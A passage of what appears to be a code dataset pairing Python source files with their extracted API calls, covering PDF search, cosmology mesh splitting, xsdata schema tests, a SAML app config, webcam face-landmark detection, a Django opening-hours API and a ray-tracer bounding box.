] | [((232, 248), 'pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute', 'knn.compute', ([], {'k': 'k'}), '(k=k)\n', (243, 248), False, 'from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn\n'), ((707, 756), 'pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute', 'knn.compute', ([], {'k': 'args.k', 'ngram_size': 'args.ngram_size'}), '(k=args.k, ngram_size=args.ngram_size)\n', (718, 756), False, 'from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn\n'), ((379, 411), 'textwrap.dedent', 'textwrap.dedent', (['compute.__doc__'], {}), '(compute.__doc__)\n', (394, 411), False, 'import textwrap\n')] |
#!/usr/bin/python
import sys;
import re;
import slate;
import pickle;
import nltk;
import glob;
import os;
def main():
if len(sys.argv) < 2:
sys.exit('Usage: %s search-term' % sys.argv[0])
targets = glob.glob('./*.pdf')
for target in targets:
print("searching in: " + target)
with open(target) as f:
doc = slate.PDF(f)
for i in range (0,len(doc)):
if sys.argv[1].lower() in doc[i].lower():
print("FOUND! in page " + str(i+1))
if __name__ == "__main__":
main() | [
"slate.PDF",
"glob.glob",
"sys.exit"
] | [((214, 234), 'glob.glob', 'glob.glob', (['"""./*.pdf"""'], {}), "('./*.pdf')\n", (223, 234), False, 'import glob\n'), ((155, 202), 'sys.exit', 'sys.exit', (["('Usage: %s search-term' % sys.argv[0])"], {}), "('Usage: %s search-term' % sys.argv[0])\n", (163, 202), False, 'import sys\n'), ((338, 350), 'slate.PDF', 'slate.PDF', (['f'], {}), '(f)\n', (347, 350), False, 'import slate\n')] |
import sys, platform, os
sys.path.insert(0,'/global/u1/s/spandey/kmeans_radec/')
import numpy as np
import scipy as sp
import scipy.integrate as integrate
import scipy.signal as spsg
import matplotlib.pyplot as plt
import pdb
import healpy as hp
from astropy.io import fits
from kmeans_radec import KMeans, kmeans_sample
import time
import math
from scipy import interpolate
import treecorr
import pickle as pk
import configparser
import ast
from astropy.io import fits
from astropy.coordinates import SkyCoord
from astropy import units as u
import astropy.constants as const
import kmeans_radec
import h5py as h5
import argparse
import gc
sys.path.insert(0,'/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/')
import process_cats_class as pcc
cosmo_params_dict = {'flat': True, 'H0': 70.0, 'Om0': 0.25, 'Ob0': 0.044, 'sigma8': 0.8, 'ns': 0.95}
from nbodykit.lab import HDFCatalog
def load_mesh_h5(cat_str, N, box_size):
f = HDFCatalog(cat_str)
f.attrs['BoxSize'] = box_size
return f.to_mesh(Nmesh=N, compensated=True)
def ang2eq(theta, phi):
ra = phi * 180. / np.pi
dec = 90. - theta * 180. / np.pi
return ra, dec
def eq2ang(ra, dec):
phi = ra * np.pi / 180.
theta = (np.pi / 2.) - dec * (np.pi / 180.)
return theta, phi
def get_zmean(zcent,delz,nz_bin):
prob_zcent = nz_bin
zmean = (np.sum(prob_zcent*zcent*delz))/(np.sum(prob_zcent*delz))
return zmean
box_size = 4225.35211
box_size_h = box_size*0.71
N = 3000
# dm_str = '/global/cscratch1/sd/samgolds/gal_cat_24_5.h5'
dm_str = '/global/cscratch1/sd/samgolds/dm_cat.h5'
mesh_dm = load_mesh_h5(dm_str, N, box_size)
mesh_dm_real = mesh_dm.to_real_field()
nsp = 10
nbox = int(N/nsp)
for j1 in range(nsp):
for j2 in range(nsp):
for j3 in range(nsp):
pk.dump(mesh_dm_real[j1*nbox:(j1+1)*nbox,j2*nbox:(j2+1)*nbox,j3*nbox:(j3+1)*nbox],open('/global/project/projectdirs/m1727/shivamp_lsst/data_set/dm_mesh/mesh_dm_real_Ng3000_fullbox_nsp' + str(nsp) + '_' + str(j1) + '_' + str(j2) + '_' + str(j3) + '.pk', 'wb'))
| [
"nbodykit.lab.HDFCatalog",
"numpy.sum",
"sys.path.insert"
] | [((25, 81), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/global/u1/s/spandey/kmeans_radec/"""'], {}), "(0, '/global/u1/s/spandey/kmeans_radec/')\n", (40, 81), False, 'import sys, platform, os\n'), ((640, 756), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/"""'], {}), "(0,\n '/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/'\n )\n", (655, 756), False, 'import sys, platform, os\n'), ((966, 985), 'nbodykit.lab.HDFCatalog', 'HDFCatalog', (['cat_str'], {}), '(cat_str)\n', (976, 985), False, 'from nbodykit.lab import HDFCatalog\n'), ((1372, 1405), 'numpy.sum', 'np.sum', (['(prob_zcent * zcent * delz)'], {}), '(prob_zcent * zcent * delz)\n', (1378, 1405), True, 'import numpy as np\n'), ((1404, 1429), 'numpy.sum', 'np.sum', (['(prob_zcent * delz)'], {}), '(prob_zcent * delz)\n', (1410, 1429), True, 'import numpy as np\n')] |
import os
from pathlib import Path
from click.testing import CliRunner
from tests.conftest import load_class
from tests.conftest import validate_bindings
from xsdata import cli
os.chdir(Path(__file__).parent.parent.parent)
def test_integration():
schema = Path("tests/fixtures/defxmlschema/chapter12/chapter12.xsd")
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [str(schema), "--package", package])
if result.exception:
raise result.exception
clazz = load_class(result.output, "Items")
validate_bindings(schema, clazz)
def test_example1202():
schema = "tests/fixtures/defxmlschema/chapter12/example1202.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1203():
schema = "tests/fixtures/defxmlschema/chapter12/example1203.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1205():
schema = "tests/fixtures/defxmlschema/chapter12/example1205.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1207():
schema = "tests/fixtures/defxmlschema/chapter12/example1207.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1209():
schema = "tests/fixtures/defxmlschema/chapter12/example1209.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1211():
schema = "tests/fixtures/defxmlschema/chapter12/example1211.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1212():
schema = "tests/fixtures/defxmlschema/chapter12/example1212.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1213():
schema = "tests/fixtures/defxmlschema/chapter12/example1213.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1215():
schema = "tests/fixtures/defxmlschema/chapter12/example1215.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1218():
schema = "tests/fixtures/defxmlschema/chapter12/example1218.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1219():
schema = "tests/fixtures/defxmlschema/chapter12/example1219.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1221():
schema = "tests/fixtures/defxmlschema/chapter12/example1221.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1223():
schema = "tests/fixtures/defxmlschema/chapter12/example1223.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1224():
schema = "tests/fixtures/defxmlschema/chapter12/example1224.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1227():
schema = "tests/fixtures/defxmlschema/chapter12/example1227.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1229():
schema = "tests/fixtures/defxmlschema/chapter12/example1229.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1230():
schema = "tests/fixtures/defxmlschema/chapter12/example1230.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1231():
schema = "tests/fixtures/defxmlschema/chapter12/example1231.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1232():
schema = "tests/fixtures/defxmlschema/chapter12/example1232.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1233():
schema = "tests/fixtures/defxmlschema/chapter12/example1233.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1235():
schema = "tests/fixtures/defxmlschema/chapter12/example1235.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1237():
schema = "tests/fixtures/defxmlschema/chapter12/example1237.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1240():
schema = "tests/fixtures/defxmlschema/chapter12/example1240.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1242():
schema = "tests/fixtures/defxmlschema/chapter12/example1242.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1244():
schema = "tests/fixtures/defxmlschema/chapter12/example1244.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1246():
schema = "tests/fixtures/defxmlschema/chapter12/example1246.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
def test_example1247():
schema = "tests/fixtures/defxmlschema/chapter12/example1247.xsd"
package = "tests.fixtures.defxmlschema.chapter12"
runner = CliRunner()
result = runner.invoke(cli, [schema, "--package", package])
if result.exception:
raise result.exception
| [
"tests.conftest.validate_bindings",
"tests.conftest.load_class",
"click.testing.CliRunner",
"pathlib.Path"
] | [((266, 325), 'pathlib.Path', 'Path', (['"""tests/fixtures/defxmlschema/chapter12/chapter12.xsd"""'], {}), "('tests/fixtures/defxmlschema/chapter12/chapter12.xsd')\n", (270, 325), False, 'from pathlib import Path\n'), ((393, 404), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (402, 404), False, 'from click.testing import CliRunner\n'), ((544, 578), 'tests.conftest.load_class', 'load_class', (['result.output', '"""Items"""'], {}), "(result.output, 'Items')\n", (554, 578), False, 'from tests.conftest import load_class\n'), ((583, 615), 'tests.conftest.validate_bindings', 'validate_bindings', (['schema', 'clazz'], {}), '(schema, clazz)\n', (600, 615), False, 'from tests.conftest import validate_bindings\n'), ((778, 789), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (787, 789), False, 'from click.testing import CliRunner\n'), ((1073, 1084), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1082, 1084), False, 'from click.testing import CliRunner\n'), ((1368, 1379), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1377, 1379), False, 'from click.testing import CliRunner\n'), ((1663, 1674), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1672, 1674), False, 'from click.testing import CliRunner\n'), ((1958, 1969), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1967, 1969), False, 'from click.testing import CliRunner\n'), ((2253, 2264), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2262, 2264), False, 'from click.testing import CliRunner\n'), ((2548, 2559), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2557, 2559), False, 'from click.testing import CliRunner\n'), ((2843, 2854), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2852, 2854), False, 'from click.testing import CliRunner\n'), ((3138, 3149), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3147, 3149), False, 'from click.testing import CliRunner\n'), ((3433, 3444), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3442, 3444), False, 'from click.testing import CliRunner\n'), ((3728, 3739), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3737, 3739), False, 'from click.testing import CliRunner\n'), ((4023, 4034), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4032, 4034), False, 'from click.testing import CliRunner\n'), ((4318, 4329), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4327, 4329), False, 'from click.testing import CliRunner\n'), ((4613, 4624), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4622, 4624), False, 'from click.testing import CliRunner\n'), ((4908, 4919), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4917, 4919), False, 'from click.testing import CliRunner\n'), ((5203, 5214), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5212, 5214), False, 'from click.testing import CliRunner\n'), ((5498, 5509), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5507, 5509), False, 'from click.testing import CliRunner\n'), ((5793, 5804), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5802, 5804), False, 'from click.testing import CliRunner\n'), ((6088, 6099), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6097, 6099), False, 'from click.testing import CliRunner\n'), ((6383, 6394), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6392, 6394), False, 'from click.testing import CliRunner\n'), ((6678, 6689), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6687, 6689), False, 'from click.testing import CliRunner\n'), ((6973, 6984), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6982, 6984), False, 'from click.testing import CliRunner\n'), ((7268, 7279), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7277, 7279), False, 'from click.testing import CliRunner\n'), ((7563, 7574), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7572, 7574), False, 'from click.testing import CliRunner\n'), ((7858, 7869), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7867, 7869), False, 'from click.testing import CliRunner\n'), ((8153, 8164), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8162, 8164), False, 'from click.testing import CliRunner\n'), ((8448, 8459), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8457, 8459), False, 'from click.testing import CliRunner\n'), ((189, 203), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (193, 203), False, 'from pathlib import Path\n')] |
import os
import sys
from django.apps import AppConfig
from . import (
__description__,
__license__,
__url__,
__verbose_name__,
__version__,
)
from .exceptions import SamlException
class SamlAppConfig(AppConfig):
name = 'openslides_saml'
verbose_name = __verbose_name__
description = __description__
version = __version__
license = __license__
url = __url__
angular_site_module = True
js_files = [
'static/js/openslides_saml/base.js',
'static/js/openslides_saml/site.js',
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
try:
import onelogin.saml2 # noqa
except ImportError:
raise SamlException('Could not import onelogin.saml2. Is python-saml3 installed?')
def ready(self):
# Import all required stuff.
from django.conf import settings
from .urls import urlpatterns
from .settings import SamlSettings
try:
settings_dir = os.path.dirname(os.path.abspath(settings.SETTINGS_FILEPATH))
except AttributeError:
raise SamlException(
"'SETTINGS_FILEPATH' is not in your settings.py. " +
"Would you kindly add the following line: 'SETTINGS_FILEPATH = __file__'?")
# Instanciate the SamlSettings, if the worker is run normally. Here,
# the class is loaded the first time and by providing the settings_path
# the internal state is set to this path.
if sys.argv[1] != 'create-saml-settings':
SamlSettings(settings_dir)
# Make the urls available for openslides
self.urlpatterns = urlpatterns
def get_angular_constants(self):
from .settings import SamlSettings
saml_settings = {
'name': 'SAMLSettings',
'value': SamlSettings.get_general_settings()}
return [saml_settings]
| [
"os.path.abspath"
] | [((1051, 1094), 'os.path.abspath', 'os.path.abspath', (['settings.SETTINGS_FILEPATH'], {}), '(settings.SETTINGS_FILEPATH)\n', (1066, 1094), False, 'import os\n')] |
import tensorflow as tf
k = tf.keras
import numpy as np
import cv2
from scipy.special import softmax, expit
import sys
import os
sys.path.insert(0, os.getcwd())
from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm
def detect_face(retinaface_model: k.Model,
pfld_model: k.Model,
anchors: np.ndarray,
draw_img: np.ndarray,
obj_thresh=0.7,
nms_threshold=0.4,
variances=[0.1, 0.2]):
""" resize """
img = cv2.cvtColor(draw_img, cv2.COLOR_BGR2RGB)
""" normlize """
det_img = ((img / 255. - 0.5) / 1)[None, ...]
""" infer """
predictions = retinaface_model.predict(det_img)
""" parser """
bbox, landm, clses = np.split(predictions[0], [4, -2], 1)
""" softmax class"""
clses = softmax(clses, -1)
score = clses[:, 1]
""" decode """
bbox = decode_bbox(bbox, anchors, variances)
bbox = bbox * np.tile([640, 640], [2])
""" filter low score """
inds = np.where(score > obj_thresh)[0]
bbox = bbox[inds]
score = score[inds]
""" keep top-k before NMS """
order = np.argsort(score)[::-1]
bbox = bbox[order]
score = score[order]
""" do nms """
keep = nms_oneclass(bbox, score, nms_threshold)
for b, s in zip(bbox[keep].astype(int), score[keep]):
cv2.rectangle(draw_img, tuple(b[:2]), tuple(b[2:]), (255, 0, 0), 2)
cx, cy = (b[:2] + b[2:]) // 2
halfw = np.max(b[2:] - b[:2]) // 2
croped_img: np.ndarray = img[cy - halfw:cy + halfw, cx - halfw:cx + halfw]
croped_wh = croped_img.shape[1::-1]
if croped_wh[0] == croped_wh[1] and min(croped_wh) > 10:
croped_img = cv2.resize(croped_img, (112, 112))
croped_img = ((croped_img / 255. - 0.5) / 1)[None, ...]
landmarks = pfld_model.predict(croped_img)
s_point = np.array([cx - halfw, cy - halfw])
for landm in np.reshape(expit(landmarks), (-1, 2)) * croped_wh:
cv2.circle(draw_img, tuple((s_point + landm).astype(int)), 1, (0, 255, 0))
return draw_img
if __name__ == "__main__":
physical_devices = tf.config.experimental.list_physical_devices('GPU')
assert len(physical_devices) > 0, "Not enough GPU hardware devices available"
tf.config.experimental.set_memory_growth(physical_devices[0], True)
retinaface_model: k.Model = k.models.load_model('asset/retinaface_train.h5')
anchors = get_anchors([640, 640], [[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]],
[8, 16, 32])
pfld_model: k.Model = k.models.load_model('asset/pfld_infer.h5')
capture = cv2.VideoCapture(0)
capture.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
while (True):
ret, img = capture.read()
# img = cv2.flip(img, 1)
img = cv2.copyMakeBorder(img, 80, 80, 0, 0, cv2.BORDER_CONSTANT, value=0)
draw_img = detect_face(retinaface_model, pfld_model, anchors, img)
cv2.imshow('frame', draw_img)
if cv2.waitKey(1) == ord('q'):
break
| [
"cv2.imshow",
"numpy.argsort",
"numpy.array",
"numpy.where",
"numpy.max",
"cv2.waitKey",
"numpy.tile",
"scipy.special.softmax",
"scipy.special.expit",
"cv2.cvtColor",
"retinaface_camera.nms_oneclass",
"cv2.resize",
"tensorflow.config.experimental.set_memory_growth",
"cv2.copyMakeBorder",
"os.getcwd",
"retinaface_camera.decode_bbox",
"numpy.split",
"cv2.VideoCapture",
"retinaface_camera.get_anchors",
"tensorflow.config.experimental.list_physical_devices"
] | [((148, 159), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (157, 159), False, 'import os\n'), ((532, 573), 'cv2.cvtColor', 'cv2.cvtColor', (['draw_img', 'cv2.COLOR_BGR2RGB'], {}), '(draw_img, cv2.COLOR_BGR2RGB)\n', (544, 573), False, 'import cv2\n'), ((747, 783), 'numpy.split', 'np.split', (['predictions[0]', '[4, -2]', '(1)'], {}), '(predictions[0], [4, -2], 1)\n', (755, 783), True, 'import numpy as np\n'), ((817, 835), 'scipy.special.softmax', 'softmax', (['clses', '(-1)'], {}), '(clses, -1)\n', (824, 835), False, 'from scipy.special import softmax, expit\n'), ((884, 921), 'retinaface_camera.decode_bbox', 'decode_bbox', (['bbox', 'anchors', 'variances'], {}), '(bbox, anchors, variances)\n', (895, 921), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((1209, 1249), 'retinaface_camera.nms_oneclass', 'nms_oneclass', (['bbox', 'score', 'nms_threshold'], {}), '(bbox, score, nms_threshold)\n', (1221, 1249), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((2070, 2121), 'tensorflow.config.experimental.list_physical_devices', 'tf.config.experimental.list_physical_devices', (['"""GPU"""'], {}), "('GPU')\n", (2114, 2121), True, 'import tensorflow as tf\n'), ((2204, 2271), 'tensorflow.config.experimental.set_memory_growth', 'tf.config.experimental.set_memory_growth', (['physical_devices[0]', '(True)'], {}), '(physical_devices[0], True)\n', (2244, 2271), True, 'import tensorflow as tf\n'), ((2363, 2440), 'retinaface_camera.get_anchors', 'get_anchors', (['[640, 640]', '[[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]]', '[8, 16, 32]'], {}), '([640, 640], [[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]], [8, 16, 32])\n', (2374, 2440), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((2545, 2564), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (2561, 2564), False, 'import cv2\n'), ((938, 962), 'numpy.tile', 'np.tile', (['[640, 640]', '[2]'], {}), '([640, 640], [2])\n', (945, 962), True, 'import numpy as np\n'), ((999, 1027), 'numpy.where', 'np.where', (['(score > obj_thresh)'], {}), '(score > obj_thresh)\n', (1007, 1027), True, 'import numpy as np\n'), ((1115, 1132), 'numpy.argsort', 'np.argsort', (['score'], {}), '(score)\n', (1125, 1132), True, 'import numpy as np\n'), ((2741, 2808), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['img', '(80)', '(80)', '(0)', '(0)', 'cv2.BORDER_CONSTANT'], {'value': '(0)'}), '(img, 80, 80, 0, 0, cv2.BORDER_CONSTANT, value=0)\n', (2759, 2808), False, 'import cv2\n'), ((2884, 2913), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'draw_img'], {}), "('frame', draw_img)\n", (2894, 2913), False, 'import cv2\n'), ((1425, 1446), 'numpy.max', 'np.max', (['(b[2:] - b[:2])'], {}), '(b[2:] - b[:2])\n', (1431, 1446), True, 'import numpy as np\n'), ((1651, 1685), 'cv2.resize', 'cv2.resize', (['croped_img', '(112, 112)'], {}), '(croped_img, (112, 112))\n', (1661, 1685), False, 'import cv2\n'), ((1813, 1847), 'numpy.array', 'np.array', (['[cx - halfw, cy - halfw]'], {}), '([cx - halfw, cy - halfw])\n', (1821, 1847), True, 'import numpy as np\n'), ((2921, 2935), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (2932, 2935), False, 'import cv2\n'), ((1878, 1894), 'scipy.special.expit', 'expit', (['landmarks'], {}), '(landmarks)\n', (1883, 1894), False, 'from scipy.special import softmax, expit\n')] |
from django.utils.datetime_safe import datetime
from rest_framework import serializers, viewsets
from rest_framework.response import Response
from opening_hours.hours import get_opening_hours
from reservation_units.models import ReservationUnit
class OpeningHours(object):
def __init__(self, id: int, start_date: datetime, end_date: datetime):
self.id = id
self.opening_hours = self.get_hours(start_date, end_date)
def get_hours(self, start_date: datetime, end_date: datetime):
return get_opening_hours(
resource_id=f"{self.id}",
start_date=start_date,
end_date=end_date,
)
class OpenTimeSerializer(serializers.Serializer):
start_time = serializers.TimeField(read_only=True)
end_time = serializers.TimeField(read_only=True)
end_time_on_next_day = serializers.BooleanField(read_only=True)
class OpeningHourDateSerialiser(serializers.Serializer):
date = serializers.DateField(read_only=True)
times = OpenTimeSerializer(read_only=True, many=True)
class OpeningHoursSerializer(serializers.Serializer):
id = serializers.IntegerField(read_only=True)
opening_hours = OpeningHourDateSerialiser(read_only=True, many=True)
class OpeningHoursViewSet(viewsets.ViewSet):
serializer_class = OpeningHoursSerializer
def retrieve(self, request, pk=None):
start_date = self.request.query_params.get("start_date")
end_date = self.request.query_params.get("end_date")
unit = ReservationUnit.objects.get(pk=pk)
return Response(
OpeningHoursSerializer(
instance=OpeningHours(
id=unit.id, start_date=start_date, end_date=end_date
)
).data
)
| [
"rest_framework.serializers.IntegerField",
"rest_framework.serializers.BooleanField",
"rest_framework.serializers.DateField",
"rest_framework.serializers.TimeField",
"opening_hours.hours.get_opening_hours",
"reservation_units.models.ReservationUnit.objects.get"
] | [((723, 760), 'rest_framework.serializers.TimeField', 'serializers.TimeField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (744, 760), False, 'from rest_framework import serializers, viewsets\n'), ((776, 813), 'rest_framework.serializers.TimeField', 'serializers.TimeField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (797, 813), False, 'from rest_framework import serializers, viewsets\n'), ((841, 881), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (865, 881), False, 'from rest_framework import serializers, viewsets\n'), ((952, 989), 'rest_framework.serializers.DateField', 'serializers.DateField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (973, 989), False, 'from rest_framework import serializers, viewsets\n'), ((1113, 1153), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (1137, 1153), False, 'from rest_framework import serializers, viewsets\n'), ((521, 611), 'opening_hours.hours.get_opening_hours', 'get_opening_hours', ([], {'resource_id': 'f"""{self.id}"""', 'start_date': 'start_date', 'end_date': 'end_date'}), "(resource_id=f'{self.id}', start_date=start_date, end_date\n =end_date)\n", (538, 611), False, 'from opening_hours.hours import get_opening_hours\n'), ((1504, 1538), 'reservation_units.models.ReservationUnit.objects.get', 'ReservationUnit.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (1531, 1538), False, 'from reservation_units.models import ReservationUnit\n')] |
# MiniLight Python : minimal global illumination renderer
#
# Copyright (c) 2007-2008, <NAME> / HXA7241 and <NAME>.
# http://www.hxa7241.org/
#
# Copyright (c) 2009-2012, <NAME>.
from vector3f import Vector3f, MAX
class Bound(object):
def __init__(self, lower, upper):
self.lower = lower
self.upper = upper
def expand_to_fit(self, bound):
for j in range(3):
if self.lower[j] > bound.lower[j]:
self.lower[j] = bound.lower[j]
if self.upper[j] < bound.upper[j]:
self.upper[j] = bound.upper[j]
def clamp(self):
size = max(list(Vector3f(self.upper) - Vector3f(self.lower)))
self.upper = list(Vector3f(self.upper).clamped(
Vector3f(self.lower) + Vector3f(size), MAX))
def encloses(self, bound):
return (
bound.upper[0] >= self.lower[0] and bound.lower[0] < self.upper[0]
and
bound.upper[1] >= self.lower[1] and bound.lower[1] < self.upper[1]
and
bound.upper[2] >= self.lower[2] and bound.lower[2] < self.upper[2]
)
def within(self, point, tolerance):
return (
(self.lower[0] - point[0] <= tolerance) and
(point[0] - self.upper[0] <= tolerance) and
(self.lower[1] - point[1] <= tolerance) and
(point[1] - self.upper[1] <= tolerance) and
(self.lower[2] - point[2] <= tolerance) and
(point[2] - self.upper[2] <= tolerance)
)
| [
"vector3f.Vector3f"
] | [((634, 654), 'vector3f.Vector3f', 'Vector3f', (['self.upper'], {}), '(self.upper)\n', (642, 654), False, 'from vector3f import Vector3f, MAX\n'), ((657, 677), 'vector3f.Vector3f', 'Vector3f', (['self.lower'], {}), '(self.lower)\n', (665, 677), False, 'from vector3f import Vector3f, MAX\n'), ((706, 726), 'vector3f.Vector3f', 'Vector3f', (['self.upper'], {}), '(self.upper)\n', (714, 726), False, 'from vector3f import Vector3f, MAX\n'), ((748, 768), 'vector3f.Vector3f', 'Vector3f', (['self.lower'], {}), '(self.lower)\n', (756, 768), False, 'from vector3f import Vector3f, MAX\n'), ((771, 785), 'vector3f.Vector3f', 'Vector3f', (['size'], {}), '(size)\n', (779, 785), False, 'from vector3f import Vector3f, MAX\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
import os
import socket
import time
import port_forward_3
#from fsplit.filesplit import Filesplit
